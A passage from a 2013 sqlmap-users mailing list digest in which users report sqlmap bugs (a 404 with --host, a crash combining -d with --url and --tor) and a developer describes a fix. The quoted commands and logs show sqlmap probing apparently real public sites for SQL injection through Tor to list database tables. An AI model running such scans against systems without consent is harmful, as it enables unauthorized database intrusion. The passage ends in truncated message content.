>>>> > [23:57:15] [INFO] heuristics detected web page charset 'ascii'
>>>> > [23:57:15] [INFO] testing if the target URL is stable. This can take a
>>>> > couple of seconds
>>>> > [23:57:16] [INFO] target URL is stable
>>>> > [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
>>>> > [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
>>>> > [23:57:16] [INFO] GET parameter 'id' is dynamic
>>>> > [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
>>>> > might be injectable (possible DBMS: 'MySQL')
>>>> > [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
>>>> >
>>>> >
>>>> > ....
>>>> >
>>>> >
>>>> > this doesn't work as expected:
>>>> >
>>>> > ./sqlmap.py --host='i.csland.ro'
>>>> > --url='http://188.240.236.15/index.php?id=0'
>>>> >
>>>> > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
>>>> > takeover tool
>>>> > http://sqlmap.org
>>>> >
>>>> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>>> > prior mutual consent is illegal. It is the end user's responsibility
>>>> to
>>>> > obey all applicable local, state and federal laws. Developers assume
>>>> no
>>>> > liability and are not responsible for any misuse or damage caused by
>>>> > this program
>>>> >
>>>> > [*] starting at 23:58:03
>>>> >
>>>> > [23:58:03] [INFO] testing connection to the target URL
>>>> > [23:58:03] [CRITICAL] page not found (404)
>>>> > it is not recommended to continue in this kind of cases. Do you want
>>>> to
>>>> > quit and make sure that everything is set up properly? [Y/n]
>>>> > [23:58:05] [WARNING] HTTP error codes detected during run:
>>>> >
>>>> > ............
>>>> >
>>>> >
>>>> > Of course i.csland.ro resolves to 188.240.236.15. Any idea?
>>>> >
>>>> > Thanks.
>>>> >
>>>> >
>>>> >
>>>> >
>>>> ------------------------------------------------------------------------------
>>>> > Precog is a next-generation analytics platform capable of advanced
>>>> > analytics on semi-structured data. The platform includes APIs for
>>>> building
>>>> > apps and a phenomenal toolset for data science. Developers can use
>>>> > our toolset for easy data analysis & visualization. Get a free
>>>> account!
>>>> > http://www2.precog.com/precogplatform/slashdotnewsletter
>>>> > _______________________________________________
>>>> > sqlmap-users mailing list
>>>> > sql...@li...
>>>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>> >
>>>>
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>> -------------- next part --------------
>>>> An HTML attachment was scrubbed...
>>>>
>>>> ------------------------------
>>>>
>>>> Message: 9
>>>> Date: Tue, 16 Apr 2013 14:33:33 +0200
>>>> From: Miroslav Stampar <mir...@gm...>
>>>> Subject: Re: [sqlmap-users] Sqlmap and direct connect error
>>>> To: ???????? ?????? <vo...@s2...>
>>>> Cc: SqlMap List <sql...@li...>
>>>> Message-ID:
>>>> <CA+9yoX0rxH+=vZuYiArFNZhK1xhwos=SNhMqEmFmnCafw-ot=g...@ma...>
>>>> Content-Type: text/plain; charset="koi8-r"
>>>>
>>>> Hi Vladimir.
>>>>
>>>> Find it "patched" with the latest commit [1]. Basically, those
>>>> combinations
>>>> should not be allowed (-d and --url; -d and --tor; etc.) and now we've
>>>> added new option validation checks for this kind of cases.
>>>>
>>>> Kind regards,
>>>> Miroslav Stampar
>>>>
>>>> [1]
>>>>
>>>> https://github.com/sqlmapproject/sqlmap/commit/c73489aff3861f1cac7de41494a296c1095e141a
>>>>
>>>>
>>>> On Tue, Apr 16, 2013 at 12:12 AM, ???????? ?????? <vo...@s2...> wrote:
>>>>
>>>> > Hi!
>>>> >
>>>> > This bug detected if add direct param.
>>>> >
>>>> > python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "
>>>> > http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor
>>>> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
>>>> > --exclude-sysdbs
>>>> >
>>>> >
>>>> > [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717,
>>>> retry
>>>> > your run with the latest development version from the GitHub
>>>> repository. If
>>>> > the exception persists, please send by e-mail to '
>>>> > sql...@li...' or open a new issue at '
>>>> > https://github.com/sqlmapproject/sqlmap/issues/new' with the
>>>> following
>>>> > text and any information required to reproduce the bug. The
>>>> developers will
>>>> > try to reproduce the bug, fix it accordingly and get back to you.
>>>> > sqlmap version: 1.0-dev-de99717
>>>> > Python version: 2.7.3
>>>> > Operating system: posix
>>>> > Command line: sqlmap.py -d
>>>> > **************************************************** -u
>>>> > http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor
>>>> > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
>>>> > --exclude-sysdbs
>>>> > Technique: None
>>>> > Back-end DBMS: MySQL (identified)
>>>> > Traceback (most recent call last):
>>>> > File "sqlmap.py", line 87, in main
>>>> > start()
>>>> > File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in
>>>> > start
>>>> > action()
>>>> > File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in
>>>> action
>>>> > setHandler()
>>>> > File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in
>>>> > setHandler
>>>> > conf.dbmsConnector.connect()
>>...
 
[truncated message content]